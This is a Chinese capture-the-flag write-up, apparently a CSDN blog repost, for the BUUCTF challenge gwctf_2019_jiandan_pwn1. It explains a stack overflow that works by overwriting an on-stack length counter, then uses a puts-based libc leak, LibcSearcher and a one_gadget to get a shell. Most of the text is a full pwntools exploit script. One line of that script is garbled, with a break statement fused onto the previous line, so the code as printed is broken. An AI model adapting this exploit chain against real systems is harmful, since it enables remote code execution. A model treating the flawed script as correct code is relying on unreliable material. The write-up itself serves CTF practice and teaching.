BUU-gwctf_2019_jiandan_pwn1-WP

本文原发布于我的博客
建议访问该站获得更好的阅读体验
看来这题没有人写WP,我就发一篇。
这道题目确实是比较简单的一道题,仅仅是要在输入的时候注意一下就可以了。
在这里插入图片描述
这里相当于是自己实现了一个gets,但是记录当前长度的变量也存在当前栈帧中,并且我们在进行读入的时候,如果想实现栈溢出,就不得不覆盖这个变量,这样的话就无法正常寻址了,所以我们需要在输入到v4这个变量是注意覆盖的值,我这里直接修改v4的值为0x118,这样就可以直接覆盖return address了。这样我们就可以泄露某个libc的函数的got,然后就可以通过LibcSearcher找出对应的libc,然后使用one_gadget来直接获得shell。
在这里插入图片描述
找出来一大堆符合条件的,但是只有这个是只有一个amd64后缀的,那就它了。
在这里插入图片描述
奇怪的是第一个gadget是不能用的,不知道为什么,然后我试了一下最后一个,拿到了shell,所以最后的exp

from pwn import *                                  
from LibcSearcher import *                              
context(log_level = 'debug',os = 'linux',arch = 'amd64')               
                                           
#sh = process("./jiandan_pwn")                            
sh = remote("node3.buuoj.cn","28570")                        
elf = ELF("./jiandan_pwn")                              
#puts_plt = elf.symbols["puts"]                           
call_puts = 0x4007BF                                 
fgetc_got = elf.got["fgetc"]                             
pop_rdi = 0x0000000000400843                             
                                           
sh.recvuntil("Hack 4 fun!\n")                            
#payload = 'a'*0x110 + 'b'*8 + p64(pop_rdi) + p64(fgetc_got) + p64(call_puts) + 'a' 
payload = 'a'*(0x110 - 0x4) + '\x18' + p64(pop_rdi) + p64(fgetc_got) + p64(call_puts)
sh.sendline(payload)                                 
                                           
data = ''                                      
last = ''                                      
while True:                                     
  now = sh.recv(numb = 1,timeout = 0.01)                      
  if last == '\n' and now == '':                          
  ┊  data = data[:-1] + '\x00'break                                    
  else:                                      
  ┊  data = data + now                              
  ┊  last = now                                  
fgetc_addr = u64(data.ljust(8,'\x00'))                        
print hex(fgetc_addr)                                
libc = LibcSearcher('fgetc',fgetc_addr)                       
libcbase = fgetc_addr - libc.dump('fgetc')                      
print hex(libcbase)                                 
                                           
execv_addr = libcbase + 0xf1147 #one_gadget                     
payload = 'a'*(0x110 - 0x4) + '\x18' + p64(execv_addr)                
sh.sendline(payload)                                 
                                           
sh.interactive()
已标记关键词 清除标记
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页